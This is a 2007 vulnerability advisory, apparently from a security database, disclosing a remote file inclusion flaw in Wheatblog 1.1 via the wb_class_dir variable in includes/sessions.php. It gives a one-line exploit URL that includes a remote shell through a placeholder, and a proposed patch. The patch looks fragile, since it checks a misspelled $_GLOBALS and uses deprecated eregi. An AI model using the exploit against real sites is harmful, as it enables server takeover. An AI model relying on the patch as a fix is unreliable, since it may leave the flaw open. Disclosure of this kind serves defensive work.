Wheatblog (wB) Remote File inclusion ..

2007-11-22T00:00:00
ID SECURITYVULNS:DOC:18481
Type securityvulns
Reporter Securityvulns
Modified 2007-11-22T00:00:00

Description

Hello,,

Wheatblog (wB) Remote File inclusion ..

tested on 1.1 and older versions are injected

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

Remote File Inclusion file : includes/sessions.php

line 2 : code:- include_once("$wb_class_dir/classDatabase.php");

variable wb_class_dir can be controlled and edited to be included from remote ..

Solution

replace code :- include_once("$wb_class_dir/classDatabase.php");

with code:- // Protected By : HACKERS PAL // Security@soqor.net // Http://WwW.SoQoR.NeT

if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir'])) { die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>"); } include_once("$wb_class_dir/classDatabase.php");

Exploit : - includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

WwW.SoQoR.NeT